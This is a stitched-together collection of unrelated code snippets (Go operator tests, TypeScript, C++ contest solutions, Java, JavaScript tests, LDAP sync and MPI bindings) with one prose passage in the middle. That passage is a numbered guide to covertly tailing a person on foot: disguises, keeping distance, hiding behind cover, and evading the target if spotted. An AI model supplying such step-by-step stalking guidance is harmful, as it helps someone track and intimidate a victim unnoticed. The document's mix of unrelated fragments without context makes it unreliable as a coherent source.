orcClient.Cluster(cluster.GetClusterAlias()) Expect(err).ToNot(Succeed()) // this is the requests that removes the finalizer and then the // cluster is deleted By("reconcile that removes the finalizer") Eventually(requests, noReconcileTime+reconcileTimeout).Should(Receive(Equal(expectedRequest))) // wait few seconds without request By("wait few seconds without reconcile requests") Consistently(requests, 3*noReconcileTime).ShouldNot(Receive(Equal(expectedRequest))) }) It("should be registered in orchestrator", func() { // check the cluster is in orchestrator insts, err := orcClient.Cluster(cluster.GetClusterAlias()) Expect(err).To(Succeed()) Expect(insts).To(haveInstance(cluster.GetPodHostname(0))) }) It("should update the status after a sync", func() { // wait reconciliation requests those requests should ensure that the cluster node // status is updated as master By("wait two reconcile requests") Eventually(requests, noReconcileTime+reconcileTimeout).Should(Receive(Equal(expectedRequest))) Eventually(requests, noReconcileTime+reconcileTimeout).Should(Receive(Equal(expectedRequest))) // get latest cluster values Expect(c.Get(context.TODO(), clusterKey, cluster.Unwrap())).To(Succeed()) // check for status to be updated Expect(cluster.GetNodeStatusFor(cluster.GetPodHostname(0))).To(haveNodeCondWithStatus(api.NodeConditionMaster, corev1.ConditionTrue)) }) }) }) // haveInstance returns a GomegaMatcher that checks if specified host is in // provided instances list func haveInstance(host string) gomegatypes.GomegaMatcher { return ContainElement(MatchFields(IgnoreExtras, Fields{ "Key": Equal(orc.InstanceKey{ Hostname: host, Port: 3306, }), })) }
import { Container } from 'aurelia-dependency-injection'; import { Position, Range, TextEdit, WorkspaceEdit, } from 'vscode-languageserver'; import { TextDocument } from 'vscode-languageserver-textdocument'; import { getWordInfoAtOffset } from '../../common/documens/find-source-word'; import { isViewModelDocument } from '../../common/documens/TextDocumentUtils'; import { ViewRegionUtils } from '../../common/documens/ViewRegionUtils'; import { AureliaProjects } from '../../core/AureliaProjects'; import { CustomElementRegion } from '../../core/regions/ViewRegions'; import { DocumentSettings } from '../configuration/DocumentSettings'; import { aureliaRenameFromViewModel } from './aureliaRename'; export async function onRenameRequest( document: TextDocument, position: Position, newName: string, container: Container ): Promise<WorkspaceEdit | undefined> { const documentSettings = container.get(DocumentSettings); const isViewModel = isViewModelDocument(document, documentSettings); if (isViewModel) { const renamed = aureliaRenameFromViewModel( container, documentSettings, document, position, newName ); return renamed; } const aureliaProjects = container.get(AureliaProjects); const targetProject = aureliaProjects.getFromUri(document.uri); if (!targetProject) return; const aureliaProgram = targetProject?.aureliaProgram; if (!aureliaProgram) return; const targetComponent = aureliaProgram.aureliaComponents.getOneByFromDocument(document); const regions = targetComponent?.viewRegions; if (!regions) return; const offset = document.offsetAt(position); const region = ViewRegionUtils.findRegionAtOffset(regions, offset); if (CustomElementRegion.is(region)) { const isInCustomElementStartTag = ViewRegionUtils.isInCustomElementStartTag( region, offset ); if (!isInCustomElementStartTag) { return normalRename(position, document, newName); } } if (region == null) { return; } // @ts-ignore TODO: implement rename for CustomElement const doRename = region.languageService.doRename; if (doRename) { const renamed = await doRename( aureliaProgram, document, position, newName, region ); // renamed; /* ? */ return renamed; } } function normalRename( position: Position, document: TextDocument, newName: string ) { const offset = document.offsetAt(position); const { startOffset, endOffset } = getWordInfoAtOffset( document.getText(), offset ); const startPosition = document.positionAt(startOffset); const endPosition = document.positionAt(endOffset + 1); // TODO: remove +1 (has to do with index 0 vs 1) const range = Range.create(startPosition, endPosition); return { changes: { [document.uri]: [TextEdit.replace(range, newName)], }, // documentChanges: [ // TextDocumentEdit.create( // { version: document.version + 1, uri: document.uri }, // [TextEdit.replace(range, newName)] // ), // ], }; }
#include<bits/stdc++.h> using namespace std; #define inf 1000000000 #define INF 1000000000000000 #define ll long long #define ull unsigned long long #define M (int)(1e9+7) #define P pair<int,int> #define PLL pair<ll,ll> #define FOR(i,m,n) for(int i=(int)m;i<(int)n;i++) #define RFOR(i,m,n) for(int i=(int)m;i>=(int)n;i--) #define rep(i,n) FOR(i,0,n) #define rrep(i,n) RFOR(i,n,0) #define all(a) a.begin(),a.end() #define IN(a,n) rep(i,n){ cin>>a[i]; } const int vx[4] = {0,1,0,-1}; const int vy[4] = {1,0,-1,0}; #define PI 3.14159265 #define F first #define S second #define PB push_back #define EB emplace_back #define int ll void init(){ cin.tie(0); ios::sync_with_stdio(false); } main(){ int q; cin>>q; priority_queue<int> q1; priority_queue<int,vector<int>,greater<int>> q2; int q1sum=0,q2sum=0; int sum=0; while(q--){ int a; cin>>a; if(a==1){ int b,c; cin>>b>>c; sum+=c; if(q1.empty()){ q1.push(b); q1sum+=b; }else if(q1.top()>b){ q1.push(b); q1sum+=b; if(q1.size()-q2.size()>1){ q2.push(q1.top()); q2sum+=q1.top(); q1sum-=q1.top(); q1.pop(); } }else if(q2.empty()||q2.top()<b){ q2.push(b); q2sum+=b; if(q2.size()-q1.size()>0){ q1.push(q2.top()); q1sum+=q2.top(); q2sum-=q2.top(); q2.pop(); } }else{ if(q1.size()-q2.size()>0){ q2.push(b); q2sum+=b; }else{ q1.push(b); q1sum+=b; } } }else{ int res=sum; res+=q1.size()*q1.top()-q1sum; res+=q2sum-q1.top()*q2.size(); // cout<<q1sum<<' '<<q2sum<<endl; cout<<q1.top()<<' '<<res<<endl; } // cout<<q1.size()<<' '<<q2.size()<<' '<<q1sum<<' '<<q2sum<<endl; } }
/** * @return {@literal true} if the token is renewable. */ protected boolean isTokenRenewable(VaultToken token) { return Optional.of(token).filter(LoginToken.class::isInstance) .filter(it -> { LoginToken loginToken = (LoginToken) it; return !loginToken.getLeaseDuration().isZero() && loginToken.isRenewable(); }).isPresent(); }
package modules import ( _ "hellclientswitch/modules/loggers" //Logger modules _ "hellclientswitch/modules/wsserver" ) //websocket modules
#include<bits/stdc++.h> using namespace std; typedef long long int ll; typedef long double ld; typedef pair<int,int> pi; typedef pair<ll,ll> pll; #define Max 1000001 #define inf INT_MAX #define llinf LONG_LONG_MAX #define fast ios_base::sync_with_stdio(false),cin.tie(NULL),cout.tie(NULL) #define pb push_back #define F first #define S second #define all_v v.begin(),v.end() #define E endl void solve() { int a,b,x,y; cin>>a>>b>>x>>y; int ans1,ans2; int row=x+1; if(a-row>=a/2) { ans1=(a-row) * b; } else { ans1= (row-1)*b; } int col=y+1; if(b-col>=b/2) { ans2= a * (b-col); } else { ans2=a*(col-1); } int final=max(ans1,ans2); cout<<final<<endl; } int main() { fast; int t; cin>>t; while(t--) { solve(); } }
<reponame>flex-office/flex-server import { MongoMemoryServer } from 'mongodb-memory-server'; import mongoose from 'mongoose'; import assert from 'assert'; import cloudinary from "cloudinary"; import * as model from "../models/model"; import Place from '../models/place'; jest.mock('cloudinary'); let mockDB; describe('Testing models', () => { beforeAll(async () => { mockDB = new MongoMemoryServer(); const uri = await mockDB.getConnectionString(); await mongoose.connect(uri, { useNewUrlParser: true }); }); describe('Users collection', () => { it('adds a new user', async () => { await model.addUser('<EMAIL>', 'AA00000', 'Name', 'Fname'); const user = await model.getUserById('AA00000'); assert(user); }); it('updates a user', async () => { model.updateUser('AA00000', { name: 'OtherName' }); const name = await model.getUserById('AA00000').then(user => user.name); assert.equal(name, 'OtherName'); }); it('updates many users', async () => { await model.addUser('<EMAIL>', 'AA00001', 'Name', 'Fname'); model.updateManyUsers({ id: /AA0000\d/ }, { name: 'OtherName' }); const nameA = await model.getUserById('AA00000').then(user => user.name); const nameB = await model.getUserById('AA00001').then(user => user.name); assert.equal(nameA, 'OtherName'); assert.equal(nameA, 'OtherName'); }); it('gets a user by ID', async () => { const user = await model.getUserById('AA00000'); assert(user); }); it('gets all users', async () => { const users = await model.getUsers(); assert(users); }); it('checks user existence', async () => { assert(await model.userExists('AA00000')); assert(!(await model.userExists('BB11111'))); }); // Need to update the tests for image upload // it('updates a photo', async () => { // const imgUrl = 'https://mlpforums.com/uploads/monthly_10_2013/post-18536-0-17144400-1381282031.jpg'; // cloudinary.uploader = { // upload: jest.fn( // () => new Promise(resolve => resolve({ secure_url: imgUrl })), // ), // }; // await model.updatePhoto('AA00000', imgUrl); // const photo = await model.getUserById('AA00000').then(user => user.photo); // assert.equal(photo, imgUrl); // }); // it('uploads a photo', async () => { // const imgUrl = 'https://mlpforums.com/uploads/monthly_10_2013/post-18536-0-17144400-1381282031.jpg'; // const mock = jest.fn( // () => new Promise(resolve => resolve({ secure_url: imgUrl })), // ); // cloudinary.uploader = { // upload: mock, // }; // model.uploadPhoto('testID', imgUrl); // assert.equal(mock.mock.calls.length, 1); // assert.equal(mock.mock.calls[0][0], 'data:image/jpeg;base64,' + imgUrl); // const mock2 = jest.fn(() => new Promise((_, reject) => reject())); // cloudinary.uploader = { // upload: mock2, // }; // model.uploadPhoto('testID', imgUrl); // assert.equal(mock2.mock.calls.length, 1); // assert.equal(mock2.mock.calls[0][0], 'data:image/jpeg;base64,' + imgUrl); // }); it('matches user info', async () => { model.updateUser('AA00000', { fname: 'a', name: 'a', }); const user = await model.getUserById('AA00000'); const info = { fname: 'a', name: 'a', }; const info2 = { fname: 'a', name: 'b', }; const info3 = { fname: 'b', name: 'b', }; assert(model.matchUserInfo(user, info)); assert(!model.matchUserInfo(user, info2)); assert(!model.matchUserInfo(user, info3)); }); }); describe('Places collection', () => { it('adds a new place', async () => { await model.addPlace('JO-4-V-RER10'); const place = await model.getPlaceById('JO-4-V-RER10'); assert(place); await model.addPlace('JO-5-V-RER10', true, 'AB12345'); const placeB = await model.getPlaceById('JO-5-V-RER10'); assert(placeB); }); it('updates a place', async () => { model.updatePlace('JO-4-V-RER10', { using: true, id_user: 'AA00000' }); const place = await model .getPlaceById('JO-4-V-RER10') .then(place => ({ using: place.using, id_user: place.id_user })); assert.deepEqual(place, { using: true, id_user: 'AA00000' }); }); it('gets a place by ID', async () => { const place = await model.getPlaceById('JO-4-V-RER10'); assert(place); }); it('gets all places', async () => { const places = await model.getPlaces(); assert(places); }); it('gets the user using a place', async () => { const id_user = await model.whoUses('JO-4-V-RER10'); assert.equal(id_user, 'AA00000'); model.updatePlace('JO-4-V-RER10', { using: false, id_user: '' }); const noOne = await model.whoUses('JO-4-V-RER10'); assert(!noOne); const sharp = await model.whoUses('WrongID'); assert.equal(sharp, '#'); }); it('resets places', async () => { await model.addPlace('JO-4-V-RER11'); model.updatePlace('JO-4-V-RER11', { using: true, id_user: 'AA00000' }); await model.addPlace('JO-4-V-RER12'); model.updatePlace('JO-4-V-RER12', { using: true, id_user: 'AA00001' }); const mockB = jest.fn(); const mockA = jest.fn(() => ({ emit: mockB })); const websocket = { sockets: { adapter: { rooms: { 'JO-4-V-RER11': true, 'JO-4-V-RER12': false, }, }, }, in: mockA, }; const pooledUsers = await model.getPooledUsers(); await model.resetPlaces(websocket, pooledUsers); assert.equal(mockA.mock.calls.length, 1); assert.equal(mockB.mock.calls.length, mockA.mock.calls.length); assert.equal(mockA.mock.calls[0][0], 'JO-4-V-RER11'); assert.equal(mockB.mock.calls[0][0], 'leavePlace'); const places = await model.getPlaces(); assert(!places.some(x => x.using)); assert(!(await model.getUserById('AA00000')).pool); assert((await model.getUserById('AA00001')).pool); assert.equal(pooledUsers[pooledUsers.length - 1], 'AA00001'); }); it('gets all pooled users', async () => { const pooledUsers = await model.getPooledUsers(); assert(pooledUsers); }); }); afterAll(() => { mongoose.disconnect(); mockDB.stop(); }); });
import { AudioListener, Object3D, OrthographicCamera, PerspectiveCamera, Scene, XRFrame } from 'three' import type { UserId } from '@xrengine/common/src/interfaces/UserId' import { createHyperStore } from '@xrengine/hyperflux' import type { InputValue } from '../../input/interfaces/InputValue' import type { World } from '../classes/World' import type { Entity } from './Entity' export class Engine { static instance: Engine /** The uuid of the logged-in user */ userId: UserId store = createHyperStore({ name: 'ENGINE', getDispatchId: () => 'engine', getDispatchTime: () => Engine.instance.elapsedTime }) elapsedTime = 0 engineTimer: { start: Function; stop: Function; clear: Function } = null! isBot = false isHMD = false /** * The current world */ currentWorld: World = null! /** * All worlds that are currently instantiated */ worlds: World[] = [] /** * Reference to the three.js scene object. */ scene: Scene = null! /** * Map of object lists by layer * (automatically updated by the SceneObjectSystem) */ objectLayerList = {} as { [layer: number]: Set<Object3D> } /** * Reference to the three.js perspective camera object. */ camera: PerspectiveCamera | OrthographicCamera = null! activeCameraEntity: Entity = null! activeCameraFollowTarget: Entity | null = null /** * Reference to the audioListener. * This is a virtual listner for all positional and non-positional audio. */ audioListener: AudioListener = null! inputState = new Map<any, InputValue>() prevInputState = new Map<any, InputValue>() publicPath: string = null! simpleMaterials = false xrFrame: XRFrame isEditor = false } globalThis.Engine = Engine
/** * Updates the activity title. * Sets the title with a left and right title. * * @param rightText Right title part */ public void updateTitle(String rightText) { String timelinename = "??"; switch (mTimelineType) { case Tweets.TIMELINE_TYPE_FAVORITES: timelinename = getString(R.string.activity_title_favorites); break; case Tweets.TIMELINE_TYPE_FRIENDS: timelinename = getString(R.string.activity_title_timeline); break; case Tweets.TIMELINE_TYPE_MENTIONS: timelinename = getString(R.string.activity_title_mentions); break; case Tweets.TIMELINE_TYPE_MESSAGES: timelinename = getString(R.string.activity_title_direct_messages); break; } String username = MyPreferences.getDefaultSharedPreferences().getString(MyPreferences.KEY_TWITTER_USERNAME, null); String leftText = getString(R.string.activity_title_format, new Object[] { timelinename, username + (mSearchMode ? " *" : "") }); TextView leftTitle = (TextView) findViewById(R.id.custom_title_left_text); leftTitle.setText(leftText); TextView rightTitle = (TextView) findViewById(R.id.custom_title_right_text); rightTitle.setText(rightText); Button createMessageButton = (Button) findViewById(R.id.createMessageButton); if (mTimelineType != Tweets.TIMELINE_TYPE_MESSAGES) { createMessageButton.setText(getString(R.string.button_create_tweet)); } else { createMessageButton.setVisibility(View.GONE); } }
/// <reference path="./SimpleEventDispatcher.d.ts" /> function makeOnce(listeners:ValidListener[],listener:ValidListener){ return function wrappedListener(arg:any){ runListener(listener,arg); removeListener(listeners,wrappedListener); } } export function isValidListener(listener:any):boolean{ return listener && ( (typeof listener == 'function') || ('handleEvent' in listener && typeof listener.handleEvent == 'function') ) } function addListener(listeners:ValidListener[],listener:ValidListener,once?:boolean){ if(!isValidListener(listener)){ throw new Error(`${listener} is not a valid listener`); } if(once){ listener = makeOnce(listeners,listener); } listeners.push(listener); return removeListener.bind(null,listeners,listener); } function removeListener(listeners:ValidListener[],listener:ValidListener):boolean{ const index = listeners.indexOf(listener); if(index < 0){return false;} listeners.splice(index,1); return true; } function runListener(listener:ValidListener,arg:any){ if((<SimpleEventListenerObject>listener).handleEvent){ (<SimpleEventListenerObject>listener).handleEvent(arg); }else{ (<SimpleEventListener>listener)(arg); } } function dispatchEvent(listeners:ValidListener[],arg?:any):boolean{ const {length} = listeners; if(!length){return false;} let i = 0; while(i < length){ const listener = listeners[i++]; listener && runListener(listener,arg); } return true; } function dispose(listeners:ValidListener[]):boolean{ listeners.length = 0; return true; } function size(listeners:ValidListener[]):number{ return listeners.length; } export function SimpleEventDispatcher(target?:Object):SimpleEventDispatcher{ const listeners:ValidListener[] = []; const dispatcher = Object.assign( target || Object.create(null) , { addEventListener:addListener.bind(null,listeners) , removeEventListener:removeListener.bind(null,listeners) , dispatchEvent:dispatchEvent.bind(null,listeners) , dispose:dispose.bind(null,listeners) , size:size.bind(null,listeners) } ); return dispatcher; }
// compareOUs checks for differences between localOUs and ldapOUs and creates tasks to sync LDAP target func compareOUs() error { var ( i int j int match bool task *actionTask ) sort.Slice(localOUs, func(i, j int) bool { return len(localOUs[i].dn) < len(localOUs[j].dn) }) sort.Slice(ldapOUs, func(i, j int) bool { return len(ldapOUs[i].dn) < len(ldapOUs[j].dn) }) for i = range localOUs { match = false for j = range ldapOUs { if localOUs[i].dn == ldapOUs[j].dn { match = true break } } if !match { glg.Debugf("marked intermediate OU for creation %s", localOUs[i].dn) task = new(actionTask) task.objectType = objectTypeOrganisationalUnit task.taskType = taskTypeCreate task.data = localOUs[i] taskList = append(taskList, task) } } for i = range ldapOUs { match = false for j = range localOUs { if ldapOUs[i].dn == localOUs[j].dn { match = true break } } if !match { glg.Debugf("marked intermediate OU for deletion %s", ldapOUs[i].dn) task = new(actionTask) task.objectType = objectTypeOrganisationalUnit task.taskType = taskTypeDelete task.dn = ldapOUs[i].dn taskList = append(taskList, task) } } return nil }
1 Prepare the proper attire. Black is a bad idea. At all hours, you'll stick out like a sore thumb. Red attracts attention. Wear greys and greens. If the weather permits it, wear a hooded sweater or jacket. 2 Prepare disguises, fake glasses, caps, changes of clothes. if possible go into a shop to change outfit. 3 Carry an empty bag (sports bag, rucksack, briefcase etc). If someone sees you you can drop the bag off somewhere. People who recognised you with the bag may, surprisingly, not recognise you without it.(Make sure the bag matches your outfit- a hoodie and a briefcase would look out of place) 4 Spot your target. See which direction they're headed in, and how fast they are moving, remember to keep this pace. 5 If there are many parked cars, outrace your target. You should be on the opposite side of the street from them. Get a little bit in front of the person you're tracking, then slow down to about their walking pace (Be careful not to make too obvious of a change. It will draw their attention). 6 If the street is fairly empty, walk behind your target by about ten meters. If the weather isn't cold enough to make a bent head plausible, keep looking down at your watch. 7 Glance at your target only as often as you need to to keep them in sight. Pretend that you're busy. Walk around reading a book, etc. 8 Be prepared for your target to stop. If this happens, keep on walking nonchalantly. If you are behind your target, move in front, until you have created that same ten meter gap. At the nearest corner or parked van, or any other form of cover for that matter, hide and look back. Be careful not to be seen while doing so. You should count to three after hiding before looking back. 9 If you are seen, don't withdraw quickly. Instead, move away at a normal pace, as though you heard a noise behind you. Then, continue walking, as though you did not recognize your quarry, until you find the next bit of suitable cover. (Note: It is recommended that if you are hiding in an indentation in a building that you hold out a book, binder, or cell phone, and return your attention to that as you withdraw back into your spot). 10 Find a desperate method of escape for if you are recognized and your target begins to approach. Look at your watch or pretend to check a text message on your cell phone, then shout a curse or exclamation and run past your target at a dead run. Do not look directly at them. Logically, if you were avoiding them, you'd run the other way, so the fact that you went past is a sure sign that you have to be somewhere. Right...? No. Find a secure hiding spot (preferably on the other side of the street), and wait it out there. Keep an eye on your target, but sit tight. 11 If your target enters a building, your method of proceeding really depends on the situation. If you plan on following the person as they emerge, get as far away from the entrance of the building as you can while still retaining the ability to recognize them if they leave. 12 Assuming that your target stops only briefly (for example, they make a call on a pay phone), be well ahead of your target while hiding. Make sure that you are across the street from them. Then, keeping your head down to keep from being recognized, allow them to walk past, giving them a distance of 15–20 meters (49.2–65.6 ft). 13 Resume following as before.
/** * Broadcast a message from the process with rank {@code root} * to all processes of the group. * <p>Java binding of the MPI operation {@code MPI_IBCAST}. * @param buf buffer * @param count number of items in buffer * @param type datatype of each item in buffer * @param root rank of broadcast root * @return communication request * @throws MPIException Signals that an MPI error of some sort has occurred. */ public final Request iBcast(Buffer buf, int count, Datatype type, int root) throws MPIException { MPI.check(); assertDirectBuffer(buf); Request req = new Request(iBcast(handle, buf, count, type.handle, root)); req.addSendBufRef(buf); return req; }